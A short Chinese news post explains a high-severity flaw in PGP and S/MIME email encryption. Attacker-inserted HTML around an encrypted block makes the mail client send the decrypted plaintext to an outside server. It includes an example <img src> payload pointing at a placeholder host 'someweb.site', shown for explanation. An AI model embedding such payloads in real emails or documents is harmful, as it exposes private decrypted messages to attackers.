PGP 和 S/MIME 高危漏洞会暴露加密邮件的明文

xuan 写道 “该漏洞主要原理:在加密块前后插入外置资源引用字段。

比如邮件内容是ABC加密后变为XXX。邮件内容会有很多块组成,多数邮件客户端支持部分块加密、部分块不加密的功能。攻击者可以在加密块前后插入明文块,使得消息变为:


<img src=”https://someweb.site/XXX” />


当邮件客户端收到邮件时,需要对加密块解密,并与非加密的内容拼接。得到以下结果:


<img src=”https://someweb.site/ABC” />



在邮件客户端渲染这封邮件的时候,会自动的请求someweb.site,并上传邮件内容ABC。导致邮件泄密。


参考来源 https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now

未经允许不得转载:网络信息台 » PGP 和 S/MIME 高危漏洞会暴露加密邮件的明文

赞 (0) 打赏

评论 0

评论前必须登录!

登陆 注册

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

微信扫一扫打赏